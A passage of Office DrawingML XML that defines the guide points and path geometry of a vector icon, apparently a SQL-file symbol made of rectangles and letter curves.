                <a:gd name="connsiteX35" fmla="*/ 373503 w 584211"/>
                <a:gd name="connsiteY35" fmla="*/ 370891 h 606439"/>
                <a:gd name="connsiteX36" fmla="*/ 527476 w 584211"/>
                <a:gd name="connsiteY36" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX37" fmla="*/ 546670 w 584211"/>
                <a:gd name="connsiteY37" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX38" fmla="*/ 546670 w 584211"/>
                <a:gd name="connsiteY38" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX39" fmla="*/ 527476 w 584211"/>
                <a:gd name="connsiteY39" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX40" fmla="*/ 504613 w 584211"/>
                <a:gd name="connsiteY40" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX41" fmla="*/ 523948 w 584211"/>
                <a:gd name="connsiteY41" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX42" fmla="*/ 523948 w 584211"/>
                <a:gd name="connsiteY42" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX43" fmla="*/ 504613 w 584211"/>
                <a:gd name="connsiteY43" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX44" fmla="*/ 482244 w 584211"/>
                <a:gd name="connsiteY44" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX45" fmla="*/ 501438 w 584211"/>
                <a:gd name="connsiteY45" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX46" fmla="*/ 501438 w 584211"/>
                <a:gd name="connsiteY46" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX47" fmla="*/ 482244 w 584211"/>
                <a:gd name="connsiteY47" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX48" fmla="*/ 459381 w 584211"/>
                <a:gd name="connsiteY48" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX49" fmla="*/ 478575 w 584211"/>
                <a:gd name="connsiteY49" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX50" fmla="*/ 478575 w 584211"/>
                <a:gd name="connsiteY50" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX51" fmla="*/ 459381 w 584211"/>
                <a:gd name="connsiteY51" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX52" fmla="*/ 435600 w 584211"/>
                <a:gd name="connsiteY52" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX53" fmla="*/ 454794 w 584211"/>
                <a:gd name="connsiteY53" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX54" fmla="*/ 454794 w 584211"/>
                <a:gd name="connsiteY54" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX55" fmla="*/ 435600 w 584211"/>
                <a:gd name="connsiteY55" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX56" fmla="*/ 412808 w 584211"/>
                <a:gd name="connsiteY56" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX57" fmla="*/ 432002 w 584211"/>
                <a:gd name="connsiteY57" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX58" fmla="*/ 432002 w 584211"/>
                <a:gd name="connsiteY58" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX59" fmla="*/ 412808 w 584211"/>
                <a:gd name="connsiteY59" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX60" fmla="*/ 390368 w 584211"/>
                <a:gd name="connsiteY60" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX61" fmla="*/ 409562 w 584211"/>
                <a:gd name="connsiteY61" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX62" fmla="*/ 409562 w 584211"/>
                <a:gd name="connsiteY62" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX63" fmla="*/ 390368 w 584211"/>
                <a:gd name="connsiteY63" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX64" fmla="*/ 367505 w 584211"/>
                <a:gd name="connsiteY64" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX65" fmla="*/ 386769 w 584211"/>
                <a:gd name="connsiteY65" fmla="*/ 321143 h 606439"/>
                <a:gd name="connsiteX66" fmla="*/ 386769 w 584211"/>
                <a:gd name="connsiteY66" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX67" fmla="*/ 367505 w 584211"/>
                <a:gd name="connsiteY67" fmla="*/ 333351 h 606439"/>
                <a:gd name="connsiteX68" fmla="*/ 436800 w 584211"/>
                <a:gd name="connsiteY68" fmla="*/ 281626 h 606439"/>
                <a:gd name="connsiteX69" fmla="*/ 482032 w 584211"/>
                <a:gd name="connsiteY69" fmla="*/ 281626 h 606439"/>
                <a:gd name="connsiteX70" fmla="*/ 482032 w 584211"/>
                <a:gd name="connsiteY70" fmla="*/ 293763 h 606439"/>
                <a:gd name="connsiteX71" fmla="*/ 436800 w 584211"/>
                <a:gd name="connsiteY71" fmla="*/ 293763 h 606439"/>
                <a:gd name="connsiteX72" fmla="*/ 382958 w 584211"/>
                <a:gd name="connsiteY72" fmla="*/ 281626 h 606439"/>
                <a:gd name="connsiteX73" fmla="*/ 428190 w 584211"/>
                <a:gd name="connsiteY73" fmla="*/ 281626 h 606439"/>
                <a:gd name="connsiteX74" fmla="*/ 428190 w 584211"/>
                <a:gd name="connsiteY74" fmla="*/ 293763 h 606439"/>
                <a:gd name="connsiteX75" fmla="*/ 382958 w 584211"/>
                <a:gd name="connsiteY75" fmla="*/ 293763 h 606439"/>
                <a:gd name="connsiteX76" fmla="*/ 165056 w 584211"/>
                <a:gd name="connsiteY76" fmla="*/ 268783 h 606439"/>
                <a:gd name="connsiteX77" fmla="*/ 194902 w 584211"/>
                <a:gd name="connsiteY77" fmla="*/ 310449 h 606439"/>
                <a:gd name="connsiteX78" fmla="*/ 164900 w 584211"/>
                <a:gd name="connsiteY78" fmla="*/ 353433 h 606439"/>
                <a:gd name="connsiteX79" fmla="*/ 136064 w 584211"/>
                <a:gd name="connsiteY79" fmla="*/ 311612 h 606439"/>
                <a:gd name="connsiteX80" fmla="*/ 165056 w 584211"/>
                <a:gd name="connsiteY80" fmla="*/ 268783 h 606439"/>
                <a:gd name="connsiteX81" fmla="*/ 65154 w 584211"/>
                <a:gd name="connsiteY81" fmla="*/ 251984 h 606439"/>
                <a:gd name="connsiteX82" fmla="*/ 26590 w 584211"/>
                <a:gd name="connsiteY82" fmla="*/ 288314 h 606439"/>
                <a:gd name="connsiteX83" fmla="*/ 54347 w 584211"/>
                <a:gd name="connsiteY83" fmla="*/ 321617 h 606439"/>
                <a:gd name="connsiteX84" fmla="*/ 71841 w 584211"/>
                <a:gd name="connsiteY84" fmla="*/ 338075 h 606439"/>
                <a:gd name="connsiteX85" fmla="*/ 55280 w 584211"/>
                <a:gd name="connsiteY85" fmla="*/ 350495 h 606439"/>
                <a:gd name="connsiteX86" fmla="*/ 29856 w 584211"/>
                <a:gd name="connsiteY86" fmla="*/ 342888 h 606439"/>
                <a:gd name="connsiteX87" fmla="*/ 25269 w 584211"/>
                <a:gd name="connsiteY87" fmla="*/ 364003 h 606439"/>
                <a:gd name="connsiteX88" fmla="*/ 53880 w 584211"/>
                <a:gd name="connsiteY88" fmla="*/ 371921 h 606439"/>
                <a:gd name="connsiteX89" fmla="*/ 96876 w 584211"/>
                <a:gd name="connsiteY89" fmla="*/ 336367 h 606439"/>
                <a:gd name="connsiteX90" fmla="*/ 68886 w 584211"/>
                <a:gd name="connsiteY90" fmla="*/ 301201 h 606439"/>
                <a:gd name="connsiteX91" fmla="*/ 49604 w 584211"/>
                <a:gd name="connsiteY91" fmla="*/ 285365 h 606439"/>
                <a:gd name="connsiteX92" fmla="*/ 64688 w 584211"/>
                <a:gd name="connsiteY92" fmla="*/ 273643 h 606439"/>
                <a:gd name="connsiteX93" fmla="*/ 87002 w 584211"/>
                <a:gd name="connsiteY93" fmla="*/ 278378 h 606439"/>
                <a:gd name="connsiteX94" fmla="*/ 92444 w 584211"/>
                <a:gd name="connsiteY94" fmla="*/ 256409 h 606439"/>
                <a:gd name="connsiteX95" fmla="*/ 65154 w 584211"/>
                <a:gd name="connsiteY95" fmla="*/ 251984 h 606439"/>
                <a:gd name="connsiteX96" fmla="*/ 165762 w 584211"/>
                <a:gd name="connsiteY96" fmla="*/ 246162 h 606439"/>
                <a:gd name="connsiteX97" fmla="*/ 108694 w 584211"/>
                <a:gd name="connsiteY97" fmla="*/ 312845 h 606439"/>
                <a:gd name="connsiteX98" fmla="*/ 159464 w 584211"/>
                <a:gd name="connsiteY98" fmla="*/ 375803 h 606439"/>
                <a:gd name="connsiteX99" fmla="*/ 167939 w 584211"/>
                <a:gd name="connsiteY99" fmla="*/ 377976 h 606439"/>
                <a:gd name="connsiteX100" fmla="*/ 217932 w 584211"/>
                <a:gd name="connsiteY100" fmla="*/ 398160 h 606439"/>
                <a:gd name="connsiteX101" fmla="*/ 226485 w 584211"/>
                <a:gd name="connsiteY101" fmla="*/ 375647 h 606439"/>
                <a:gd name="connsiteX102" fmla="*/ 195152 w 584211"/>
                <a:gd name="connsiteY102" fmla="*/ 367341 h 606439"/>
                <a:gd name="connsiteX103" fmla="*/ 195152 w 584211"/>
                <a:gd name="connsiteY103" fmla="*/ 366565 h 606439"/>
                <a:gd name="connsiteX104" fmla="*/ 225940 w 584211"/>
                <a:gd name="connsiteY104" fmla="*/ 308886 h 606439"/>
                <a:gd name="connsiteX105" fmla="*/ 165762 w 584211"/>
                <a:gd name="connsiteY105" fmla="*/ 246162 h 606439"/>
                <a:gd name="connsiteX106" fmla="*/ 416406 w 584211"/>
                <a:gd name="connsiteY106" fmla="*/ 242816 h 606439"/>
                <a:gd name="connsiteX107" fmla="*/ 455923 w 584211"/>
                <a:gd name="connsiteY107" fmla="*/ 242816 h 606439"/>
                <a:gd name="connsiteX108" fmla="*/ 455923 w 584211"/>
                <a:gd name="connsiteY108" fmla="*/ 255024 h 606439"/>
                <a:gd name="connsiteX109" fmla="*/ 416406 w 584211"/>
                <a:gd name="connsiteY109" fmla="*/ 255024 h 606439"/>
                <a:gd name="connsiteX110" fmla="*/ 369480 w 584211"/>
                <a:gd name="connsiteY110" fmla="*/ 242816 h 606439"/>
                <a:gd name="connsiteX111" fmla="*/ 408926 w 584211"/>
                <a:gd name="connsiteY111" fmla="*/ 242816 h 606439"/>
                <a:gd name="connsiteX112" fmla="*/ 408926 w 584211"/>
                <a:gd name="connsiteY112" fmla="*/ 255024 h 606439"/>
                <a:gd name="connsiteX113" fmla="*/ 369480 w 584211"/>
                <a:gd name="connsiteY113" fmla="*/ 255024 h 606439"/>
                <a:gd name="connsiteX114" fmla="*/ 277488 w 584211"/>
                <a:gd name="connsiteY114" fmla="*/ 241970 h 606439"/>
                <a:gd name="connsiteX115" fmla="*/ 245844 w 584211"/>
                <a:gd name="connsiteY115" fmla="*/ 243755 h 606439"/>
                <a:gd name="connsiteX116" fmla="*/ 245844 w 584211"/>
                <a:gd name="connsiteY116" fmla="*/ 376656 h 606439"/>
                <a:gd name="connsiteX117" fmla="*/ 336189 w 584211"/>
                <a:gd name="connsiteY117" fmla="*/ 379762 h 606439"/>
                <a:gd name="connsiteX118" fmla="*/ 336189 w 584211"/>
                <a:gd name="connsiteY118" fmla="*/ 352980 h 606439"/>
                <a:gd name="connsiteX119" fmla="*/ 277488 w 584211"/>
                <a:gd name="connsiteY119" fmla="*/ 351970 h 606439"/>
                <a:gd name="connsiteX120" fmla="*/ 361303 w 584211"/>
                <a:gd name="connsiteY120" fmla="*/ 72971 h 606439"/>
                <a:gd name="connsiteX121" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY121" fmla="*/ 73204 h 606439"/>
                <a:gd name="connsiteX122" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY122" fmla="*/ 205174 h 606439"/>
                <a:gd name="connsiteX123" fmla="*/ 409663 w 584211"/>
                <a:gd name="connsiteY123" fmla="*/ 205174 h 606439"/>
                <a:gd name="connsiteX124" fmla="*/ 409663 w 584211"/>
                <a:gd name="connsiteY124" fmla="*/ 217361 h 606439"/>
                <a:gd name="connsiteX125" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY125" fmla="*/ 217361 h 606439"/>
                <a:gd name="connsiteX126" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY126" fmla="*/ 281638 h 606439"/>
                <a:gd name="connsiteX127" fmla="*/ 375375 w 584211"/>
                <a:gd name="connsiteY127" fmla="*/ 281638 h 606439"/>
                <a:gd name="connsiteX128" fmla="*/ 375375 w 584211"/>
                <a:gd name="connsiteY128" fmla="*/ 293749 h 606439"/>
                <a:gd name="connsiteX129" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY129" fmla="*/ 293749 h 606439"/>
                <a:gd name="connsiteX130" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY130" fmla="*/ 358724 h 606439"/>
                <a:gd name="connsiteX131" fmla="*/ 368378 w 584211"/>
                <a:gd name="connsiteY131" fmla="*/ 358724 h 606439"/>
                <a:gd name="connsiteX132" fmla="*/ 368378 w 584211"/>
                <a:gd name="connsiteY132" fmla="*/ 370912 h 606439"/>
                <a:gd name="connsiteX133" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY133" fmla="*/ 370912 h 606439"/>
                <a:gd name="connsiteX134" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY134" fmla="*/ 401265 h 606439"/>
                <a:gd name="connsiteX135" fmla="*/ 375609 w 584211"/>
                <a:gd name="connsiteY135" fmla="*/ 401265 h 606439"/>
                <a:gd name="connsiteX136" fmla="*/ 375609 w 584211"/>
                <a:gd name="connsiteY136" fmla="*/ 413453 h 606439"/>
                <a:gd name="connsiteX137" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY137" fmla="*/ 413453 h 606439"/>
                <a:gd name="connsiteX138" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY138" fmla="*/ 531760 h 606439"/>
                <a:gd name="connsiteX139" fmla="*/ 361303 w 584211"/>
                <a:gd name="connsiteY139" fmla="*/ 531993 h 606439"/>
                <a:gd name="connsiteX140" fmla="*/ 545259 w 584211"/>
                <a:gd name="connsiteY140" fmla="*/ 531993 h 606439"/>
                <a:gd name="connsiteX141" fmla="*/ 561975 w 584211"/>
                <a:gd name="connsiteY141" fmla="*/ 515303 h 606439"/>
                <a:gd name="connsiteX142" fmla="*/ 561975 w 584211"/>
                <a:gd name="connsiteY142" fmla="*/ 89661 h 606439"/>
                <a:gd name="connsiteX143" fmla="*/ 545259 w 584211"/>
                <a:gd name="connsiteY143" fmla="*/ 72971 h 606439"/>
                <a:gd name="connsiteX144" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY144" fmla="*/ 0 h 606439"/>
                <a:gd name="connsiteX145" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY145" fmla="*/ 50847 h 606439"/>
                <a:gd name="connsiteX146" fmla="*/ 361303 w 584211"/>
                <a:gd name="connsiteY146" fmla="*/ 50692 h 606439"/>
                <a:gd name="connsiteX147" fmla="*/ 545259 w 584211"/>
                <a:gd name="connsiteY147" fmla="*/ 50692 h 606439"/>
                <a:gd name="connsiteX148" fmla="*/ 584211 w 584211"/>
                <a:gd name="connsiteY148" fmla="*/ 89661 h 606439"/>
                <a:gd name="connsiteX149" fmla="*/ 584211 w 584211"/>
                <a:gd name="connsiteY149" fmla="*/ 515303 h 606439"/>
                <a:gd name="connsiteX150" fmla="*/ 545259 w 584211"/>
                <a:gd name="connsiteY150" fmla="*/ 554195 h 606439"/>
                <a:gd name="connsiteX151" fmla="*/ 361303 w 584211"/>
                <a:gd name="connsiteY151" fmla="*/ 554195 h 606439"/>
                <a:gd name="connsiteX152" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY152" fmla="*/ 554117 h 606439"/>
                <a:gd name="connsiteX153" fmla="*/ 358892 w 584211"/>
                <a:gd name="connsiteY153" fmla="*/ 606439 h 606439"/>
                <a:gd name="connsiteX154" fmla="*/ 0 w 584211"/>
                <a:gd name="connsiteY154" fmla="*/ 557378 h 606439"/>
                <a:gd name="connsiteX155" fmla="*/ 0 w 584211"/>
                <a:gd name="connsiteY155" fmla="*/ 47819 h 60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584211" h="606439">
                  <a:moveTo>
                    <a:pt x="456840" y="401235"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="478574" y="401235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478574" y="413443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456840" y="413443"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="430943" y="401235"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="452677" y="401235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452677" y="413443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430943" y="413443"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="405539" y="401235"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="427273" y="401235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427273" y="413443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405539" y="413443"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="379642" y="401235"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="401447" y="401235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401447" y="413443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379642" y="413443"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="502779" y="358754"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="530158" y="358754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530158" y="370891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502779" y="370891"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="470389" y="358754"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="497627" y="358754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497627" y="370891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470389" y="370891"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="438423" y="358754"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="465661" y="358754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465661" y="370891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438423" y="370891"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="405892" y="358754"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="433271" y="358754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433271" y="370891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405892" y="370891"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="373503" y="358754"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="400882" y="358754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400882" y="370891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373503" y="370891"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="527476" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="546670" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546670" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527476" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="504613" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="523948" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523948" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504613" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="482244" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="501438" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501438" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482244" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="459381" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="478575" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478575" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459381" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="435600" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="454794" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454794" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435600" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="412808" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="432002" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432002" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412808" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="390368" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="409562" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409562" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390368" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="367505" y="321143"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="386769" y="321143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386769" y="333351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367505" y="333351"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="436800" y="281626"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="482032" y="281626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482032" y="293763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436800" y="293763"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="382958" y="281626"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="428190" y="281626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428190" y="293763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382958" y="293763"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="165056" y="268783"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="184098" y="268007"/>
                    <a:pt x="194902" y="287016"/>
                    <a:pt x="194902" y="310449"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194902" y="335510"/>
                    <a:pt x="183710" y="353744"/>
                    <a:pt x="164900" y="353433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146713" y="353045"/>
                    <a:pt x="135909" y="334967"/>
                    <a:pt x="136064" y="311612"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136064" y="288646"/>
                    <a:pt x="146557" y="269559"/>
                    <a:pt x="165056" y="268783"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="65154" y="251984"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="40819" y="253381"/>
                    <a:pt x="26590" y="268985"/>
                    <a:pt x="26590" y="288314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26590" y="304772"/>
                    <a:pt x="37398" y="315097"/>
                    <a:pt x="54347" y="321617"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66865" y="326586"/>
                    <a:pt x="71841" y="330778"/>
                    <a:pt x="71841" y="338075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71841" y="345760"/>
                    <a:pt x="66087" y="350651"/>
                    <a:pt x="55280" y="350495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45328" y="350263"/>
                    <a:pt x="35920" y="346536"/>
                    <a:pt x="29856" y="342888"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25269" y="364003"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="30867" y="367729"/>
                    <a:pt x="42218" y="371455"/>
                    <a:pt x="53880" y="371921"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82803" y="372930"/>
                    <a:pt x="96876" y="356395"/>
                    <a:pt x="96876" y="336367"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96876" y="319521"/>
                    <a:pt x="87779" y="308653"/>
                    <a:pt x="68886" y="301201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55435" y="295844"/>
                    <a:pt x="49604" y="292739"/>
                    <a:pt x="49604" y="285365"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49604" y="279387"/>
                    <a:pt x="54502" y="274031"/>
                    <a:pt x="64688" y="273643"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75028" y="273177"/>
                    <a:pt x="82648" y="276204"/>
                    <a:pt x="87002" y="278378"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="92444" y="256409"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="85991" y="253614"/>
                    <a:pt x="77050" y="251285"/>
                    <a:pt x="65154" y="251984"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="165762" y="246162"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="130386" y="248180"/>
                    <a:pt x="108694" y="276670"/>
                    <a:pt x="108694" y="312845"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108694" y="352203"/>
                    <a:pt x="132796" y="373008"/>
                    <a:pt x="159464" y="375803"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162341" y="376113"/>
                    <a:pt x="165218" y="376734"/>
                    <a:pt x="167939" y="377976"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184500" y="385739"/>
                    <a:pt x="199506" y="391949"/>
                    <a:pt x="217932" y="398160"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="226485" y="375647"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="216144" y="373163"/>
                    <a:pt x="205026" y="370524"/>
                    <a:pt x="195152" y="367341"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195152" y="366565"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212101" y="359345"/>
                    <a:pt x="225940" y="338618"/>
                    <a:pt x="225940" y="308886"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225940" y="273099"/>
                    <a:pt x="204015" y="243988"/>
                    <a:pt x="165762" y="246162"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="416406" y="242816"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="455923" y="242816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455923" y="255024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416406" y="255024"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="369480" y="242816"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="408926" y="242816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408926" y="255024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369480" y="255024"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="277488" y="241970"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="245844" y="243755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245844" y="376656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336189" y="379762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336189" y="352980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277488" y="351970"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="361303" y="72971"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="360525" y="72971"/>
                    <a:pt x="359670" y="73049"/>
                    <a:pt x="358892" y="73204"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="358892" y="205174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409663" y="205174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409663" y="217361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358892" y="217361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358892" y="281638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375375" y="281638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375375" y="293749"/>
                  </a:lnTo>
                  <a:lnTo>
